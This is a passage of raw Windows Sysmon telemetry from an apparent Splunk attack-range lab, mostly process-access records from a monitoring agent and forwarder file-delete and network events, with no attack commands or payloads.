Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015170Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:22.660{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015169Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:22.653{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015168Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:22.643{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015167Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:22.603{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015166Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:22.596{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015165Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:22.589{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015164Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:22.572{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000015163Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:22.564{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015162Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:22.556{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015161Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:22.554{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015160Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:22.547{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 23542300x800000000000000015159Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:22.486{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4D865239FD0320274F3C5F698F232DF,SHA256=FF98E5271593B85F687D65E0D46F2516482B764A35F65B335B6B084D4520B88D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000015191Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:23.803{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5DF896B35B1254721A9B6A043B086B1,SHA256=A82AEB5139909CC05379A000DA5A6296571E05927DC25B036F0B89C3D4174A7D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000039891Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:19.666{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56227-false10.0.1.12-8000- 23542300x800000000000000015192Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:24.863{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2267327D502A3A3174F9C5DA40A1822,SHA256=4059F25D071EB874AD09372C1A6D5BCB97189E7324D6D06B34B4DCC4C8457137,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000039892Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:24.002{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA318C2B0CE5AC663184E8BD27A58D7F,SHA256=F535C88F08158F705BEBCC259B96A3B46C4BE2CAA9339A5BB6C647475C8DA805,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015197Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:25.958{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1B5426BAE48B4CAD261C935C8293C09,SHA256=752E08E94A969DA849FE387DB4D0A7F6DE81766AD5302FFCF09EBCE6FA60B41D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000039893Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:25.086{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AAB7FB04FBAC0EB6B44D0766BFC83F2,SHA256=14E755A6F6552134B95F4A31DA5B7B41F908416C122A6B9AFF4273008909F518,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000015196Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:25.669{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015195Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:25.669{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015194Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:25.669{E5A8D418-DC43-63C7-0B00-00000000B002}632680C:\Windows\system32\lsass.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+1bfed|C:\Windows\system32\lsasrv.dll+28fbb|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015193Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:25.655{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1C00-00000000B002}2020C:\Program Files\Aurora-Agent\aurora-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000039897Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:26.495{FE4C2B44-D9F5-63C7-1100-00000000AF02}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=5F57D200D3B74EC70A64E966C2BD1FC3,SHA256=F50B9208454B401280C68F706976C594D799862321F4E327870BC6C8176C9638,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000039896Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:26.308{FE4C2B44-D9F5-63C7-1600-00000000AF02}12966840C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bca3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22acf|C:\Windows\system32\wbem\wbemcore.dll+22a09|C:\Windows\system32\wbem\wbemcore.dll+21f4a|C:\Windows\system32\wbem\wbemcore.dll+2c9ae|C:\Windows\system32\wbem\wbemcore.dll+202cc|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22baa|C:\Windows\system32\wbem\wbemcore.dll+22a09|C:\Windows\system32\wbem\wbemcore.dll+21f4a|C:\Windows\system32\wbem\wbemcore.dll+22701|C:\Windows\system32\wbem\wbemcore.dll+2d77c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039895Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:26.308{FE4C2B44-D9F5-63C7-1600-00000000AF02}12966840C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bca3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22acf|C:\Windows\system32\wbem\wbemcore.dll+22a09|C:\Windows\system32\wbem\wbemcore.dll+21f4a|C:\Windows\system32\wbem\wbemcore.dll+2c9ae|C:\Windows\system32\wbem\wbemcore.dll+202cc|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22baa|C:\Windows\system32\wbem\wbemcore.dll+22a09|C:\Windows\system32\wbem\wbemcore.dll+21f4a|C:\Windows\system32\wbem\wbemcore.dll+22701|C:\Windows\system32\wbem\wbemcore.dll+2d77c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000039894Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:26.152{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E21338ED302A416E61CFE41B3663AAC2,SHA256=34133A6839543347AF836CEAA2DE271757B90BEEED69B804D58AB451C32F6B7B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000039900Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:27.979{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-D9F1-63C7-0100-00000000AF02}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\kerberos.DLL+97b62|C:\Windows\system32\kerberos.DLL+79e38|C:\Windows\system32\kerberos.DLL+144ff|C:\Windows\system32\lsasrv.dll+2fa11|C:\Windows\system32\lsasrv.dll+2d8f6|C:\Windows\system32\lsasrv.dll+33189|C:\Windows\system32\lsasrv.dll+30ad7|C:\Windows\system32\lsasrv.dll+2fa11|C:\Windows\system32\lsasrv.dll+17a7d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e 23542300x800000000000000039899Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:27.471{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B7E616F96B7BBFB82BF7130F79C861FF,SHA256=784F4924BD8FD182C26EA63E1A41C4AA6BD4EA85FEA6DA0417976E9A8570384D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000039898Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:27.221{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=866448B0CF79808A8AA8353628E7597E,SHA256=A482F3D846C503926410AE8E89060F34A704AB35945D36CB7AFFF2D9F8D20448,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000015199Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:25.915{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50042-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000015198Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:27.048{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27AA3C9DBD0D966B19770A7FD7393E50,SHA256=78A702A5A7602F2C254D849696116C0A70F4A07A6DC0A1F3C32FC3721F5B917D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000015200Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:28.142{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A23BDE77C77CA741A917F3E99BD7629,SHA256=906CD3BA880ADF3C190D09C64A3FEE4B0167F83C792AEA456FD3D8F967964A3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000039910Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:28.295{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6516F0FB0C9E952C38C0C9552FC3A1C,SHA256=82BDB827C70E32DBBC13DB429AA78FCFC0F29922EF233C18D59B82FE77EEB58D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000039909Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 